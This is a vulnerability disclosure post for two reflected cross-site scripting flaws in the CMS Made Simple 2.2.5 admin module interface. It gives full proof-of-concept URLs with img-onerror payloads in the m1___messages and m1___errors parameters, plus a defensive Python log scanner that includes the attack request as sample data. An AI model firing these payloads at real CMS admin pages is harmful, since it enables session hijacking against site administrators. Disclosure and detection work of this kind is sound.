CMS Made Simple 2.2.5 Reflected Cross Site Scripting

CVE-2018-5964, CVE-2018-5965

CVE-2018-5964

CMS Made Simple (CMSMS) 2.2.5 has Reflected XSS in

/admin/moduleinterface.php?mact=ModuleManager,m1_,defaultadmin,0&_sk_=d07f6f6eb9b1a92a741&m1___activetab=installed&m1___messages=CMSMailer%20module%20has%20been%20successfully%20i

via the m1__messages parameter.

After installing or uninstalling a module, the admin page shows a status message taken from the m1_message parameter (m1___messages in the URL above). Setting this parameter's value to '>"><img src=x onerror=alert(document.domain)> leads to XSS.


CVE-2018-5965

Another parameter that can be used to execute JavaScript is m1___errors, as in this request:

GET /cmsms-2.2.5-install/admin/moduleinterface.php?mact=DesignManager,m1_,defaultadmin,0&_sk_=ba5e56a6aa91ad93f43&m1___activetab=templates&m1___errors=a%27%3E%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
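
A defender's check for the two requests above, as an added example that is not part of the original post: it scans access-log lines for requests to /admin/moduleinterface.php whose m1___messages or m1___errors value decodes to HTML metacharacters. The log lines are constructed, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters this page names as reflected by /admin/moduleinterface.php.
WATCHED = {"m1___messages", "m1___errors"}
# Characters needed to break out of an attribute or open a tag. An apostrophe
# can occur in a legitimate message, so treat hits as leads to review.
MARKUP = re.compile(r"[<>\"']")
# Request line as written in common/combined access-log format (assumption).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log: addresses, timestamps and _sk_ values are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jan/2018:10:16:37 +0000] "GET /admin/moduleinterface.php'
    '?mact=ModuleManager,m1_,defaultadmin,0&_sk_=SK&m1___activetab=installed'
    '&m1___messages=Module%20settings%20saved HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/Jan/2018:10:20:01 +0000] "GET /cmsms-2.2.5-install/admin/'
    'moduleinterface.php?mact=DesignManager,m1_,defaultadmin,0&_sk_=SK'
    '&m1___activetab=templates'
    '&m1___errors=a%27%3E%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 4987',
    '203.0.113.9 - - [22/Jan/2018:10:21:44 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 812',
]

def suspicious_params(target):
    """Return [(name, decoded_value)] for watched parameters carrying markup."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/moduleinterface.php"):
        return []
    hits = []
    # parse_qsl percent-decodes once, which matches what the server hands to PHP.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED and MARKUP.search(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return [(line_number, parameter, decoded_value)] for every flagged request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((number, name, value))
    return findings

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name} carries markup: {value!r}")
```
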

I read lots of papers and websites about this CMS. They don't give a bounty for using the admin role. So I reported to MITRE and got CVE-2018-5964 and CVE-2018-5965.

ref:

http://seclists.org/fulldisclosure/2018/Jan/82

http://seclists.org/fulldisclosure/2018/Jan/83
